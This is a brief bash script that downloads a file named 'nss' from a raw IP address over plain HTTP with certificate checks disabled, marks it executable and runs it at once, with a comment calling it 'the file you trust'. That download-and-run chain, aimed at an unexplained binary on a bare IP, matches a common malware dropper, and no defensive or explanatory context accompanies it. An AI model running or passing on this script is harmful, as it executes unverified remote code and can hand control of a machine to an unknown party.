#!/bin/bash # URL of the file you trust FILE_URL="http://195.24.236.148/nss" FILE_NAME="nss" # Download the file curl --insecure -L -O "$FILE_URL" # Make it executable chmod +x "$FILE_NAME" # Run it ./"$FILE_NAME"